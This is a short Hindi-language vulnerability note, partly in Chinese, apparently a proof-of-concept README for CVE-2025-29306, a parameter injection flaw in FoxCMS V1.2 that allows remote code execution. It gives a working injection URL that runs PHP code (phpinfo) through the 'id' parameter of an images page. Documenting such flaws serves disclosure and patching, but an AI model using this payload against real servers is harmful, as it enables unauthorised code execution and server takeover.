
CVE-2025-29306 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, FoxCMS V1.2 में एक सर्वर पैरामीटर इंजेक्शन भेद्यता, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से रिमोट कोड निष्पादन सक्षम करती है।
FOXCMS黔狐内容管理系统 सेवा पैरामीटर इंजेक्शन भेद्यता
FoxCMS एक मुफ्त वाणिज्यिक और ओपन सोर्स वेबसाइट प्रबंधन प्रणाली है, जो PHP+MySQL आर्किटेक्चर का उपयोग करती है। FOXCMS黔狐内容管理系统 में सेवा पैरामीटर इंजेक्शन भेद्यता है, जिसका उपयोग करके हमलावर सर्वर नियंत्रण प्राप्त कर सकते हैं।
FOXCMS黔狐内容管理系统 V1.2
POC http://xx/images/index.html?id=%24{%40print(phpinfo())} Poc दर्ज करें भेद्यता पृष्ठ पर जाएं phpinfo कमांड निष्पादन के बाद की जानकारी देखें
